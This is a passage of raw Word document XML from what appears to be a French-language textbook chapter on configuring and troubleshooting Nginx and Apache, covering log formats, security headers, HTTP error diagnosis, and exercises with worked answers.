              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Très courant</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Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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Modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Compilation ou paquets</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Activation dynamique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2774"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mémoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible</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Plus élevée sous charge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>60.4 Journaux et en-têtes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les journaux sont la première source d'information en cas d'incident. Un format enrichi coûte peu et répond à beaucoup de questions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un format qui mesure le temps · nginx</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Format de journal enrichi</w:t>
        <w:br/>
        <w:t>log_format principal '$remote_addr - $remote_user [$time_local] '</w:t>
        <w:br/>
        <w:t xml:space="preserve">                     '"$request" $status $body_bytes_sent '</w:t>
        <w:br/>
        <w:t xml:space="preserve">                     '"$http_referer" "$http_user_agent" '</w:t>
        <w:br/>
        <w:t xml:space="preserve">                     'rt=$request_time uct=$upstream_connect_time '</w:t>
        <w:br/>
        <w:t xml:space="preserve">                     'urt=$upstream_response_time';</w:t>
        <w:br/>
        <w:br/>
        <w:t>access_log /var/log/nginx/access.log principal;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Cinq en-têtes · nginx</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En-têtes de sécurité</w:t>
        <w:br/>
        <w:t>add_header Strict-Transport-Security "max-age=63072000; includeSubDomains"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  always;</w:t>
        <w:br/>
        <w:t>add_header X-Content-Type-Options "nosniff" always;</w:t>
        <w:br/>
        <w:t>add_header Referrer-Policy "strict-origin-when-cross-origin" always;</w:t>
        <w:br/>
        <w:t>add_header Content-Security-Policy "default-src 'self'" always;</w:t>
        <w:br/>
        <w:t>add_header Permissions-Policy "camera=(), microphone=(), geolocation=()"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  always;</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`X-FORWARDED-FOR`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>En-tête qui transporte l'adresse du client d'origine à travers un proxy. Sans lui, l'application voit l'adresse du proxy et ne peut ni journaliser ni limiter correctement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>60.5 Diagnostiquer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois codes concentrent les problèmes de configuration : 403, 404 et 502. Chacun a un petit nombre de causes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.215 — Six codes et leurs causes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169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Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Cause fréquente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Vérification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1690"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>403</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3662"/>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Droits ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>index</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3662"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>namei -l /var/www/...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1690"/>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404</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="366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root</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>try_files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> incorrect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="366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nginx -T</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1690"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>502</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3662"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Application arrêtée ou port erroné</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3662"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ss -ltnp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>, journal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1690"/>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504</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Application trop lente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="366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request_time</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>upstream_response_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1690"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>413</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3662"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Corps trop volumineux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3662"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>client_max_body_size</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1690"/>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499</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Client parti avant la réponse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Latence excessive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois vérifications ciblées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403 : vérifier chaque niveau du chemin</w:t>
        <w:br/>
        <w:t>namei -l /var/www/exemple/index.html</w:t>
        <w:br/>
        <w:br/>
        <w:t># 502 : l'application écoute-t-elle ?</w:t>
        <w:br/>
        <w:t>ss -ltnp | grep 3000</w:t>
        <w:br/>
        <w:t>journalctl -u mon-app -n 30 --no-pager</w:t>
        <w:br/>
        <w:br/>
        <w:t># Mesurer le temps applicatif</w:t>
        <w:br/>
        <w:t>tail -f /var/log/nginx/access.log | awk '{print $NF, $(NF-2)}'</w:t>
      </w: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TESTER DEPUIS LE SERVEUR</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Une requête </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>curl -H "Host: exemple.fr" http://127.0.0.1/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> teste la configuration sans passer par le DNS ni le pare-feu. Cela sépare un problème applicatif d'un problème réseau.</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AVANT DE RECHARGER</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nginx -t</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>apachectl configtest</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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Recharger, pas redémarrer, quand c'est possible.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Vérifier le journal d'erreur dans les secondes qui suivent.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Tester une URL connue et une URL inexistante.</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serveur web peut servir du statique, proxyfier, ou les deux.</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Nginx organise la configuration en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w: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La barre finale de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>proxy_pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> change le chemin transmis.</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try_files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> définit l'ordre de résolution des fichiers.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Apache peut se configurer par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.htaccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, au prix de la performance.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X-Forwarded-For</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> préserve l'adresse du client.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403, 404 et 502 ont des causes distinctes et identifiables.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Toujours valider la configuration avant de recharger.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un serveur suffit rarement. Le chapitre suivant répartit la charge et rapproche les contenus des utilisateurs.</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60.1 — Servir une application derrière Nginx</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Une application Node écoute sur le port 3000.</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Configurez le proxy.</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Transmettez les en-têtes.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les fichiers statiques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 60.2 — Corriger une erreur 403</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Nginx renvoie 403 alors que le fichier existe.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Vérifiez les droits de chaque niveau.</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Vérifiez l'utilisateur du processus.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Corrigez sans ouvrir à tout le monde.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 60.3 — Corriger une erreur 502</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Le proxy renvoie 502 après un déploiement.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Vérifiez l'écoute de l'application.</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Vérifiez le port configuré.</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Consultez les journaux applicatifs.</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60.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>server {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    listen 80;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    server_name exemple.fr;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    root /var/www/exemple;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    index index.html;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    location /assets/ {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        expires 1y;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        add_header Cache-Control "public, immutable";</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    location /api/ {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        proxy_pass http://127.0.0.1:3000/;</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w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    location / {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        try_files $uri /index.html;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les fichiers statiques évitent de solliciter l'application pour des ressources immuables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-Forwarded-Proto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, l'application croit recevoir du HTTP et peut générer des URL erronées.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 60.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>namei -l /var/www/exemple/index.html</w:t>
        <w:br/>
        <w:t>ps -o user= -p $(pgrep -f "nginx: worker" | head -1)</w:t>
        <w:br/>
        <w:br/>
        <w:t># Correction minimale : traversée pour tous, lecture pour nginx</w:t>
        <w:br/>
